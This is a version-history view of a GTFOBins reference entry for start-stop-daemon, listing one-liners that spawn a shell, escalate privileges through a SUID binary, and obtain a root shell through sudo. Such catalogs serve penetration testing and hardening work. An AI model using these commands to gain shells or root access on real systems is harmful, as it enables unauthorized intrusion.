GTFOBins.github.io/_gtfobins/start-stop-daemon.md

10 lines
222 B
Markdown
Raw Normal View History

2018-11-05 15:34:57 +00:00
---
functions:
shell:
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
suid:
2018-11-05 15:41:04 +00:00
- code: ./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
2018-11-05 15:34:57 +00:00
sudo:
2018-11-05 15:41:04 +00:00
- code: sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
2018-11-05 15:34:57 +00:00
---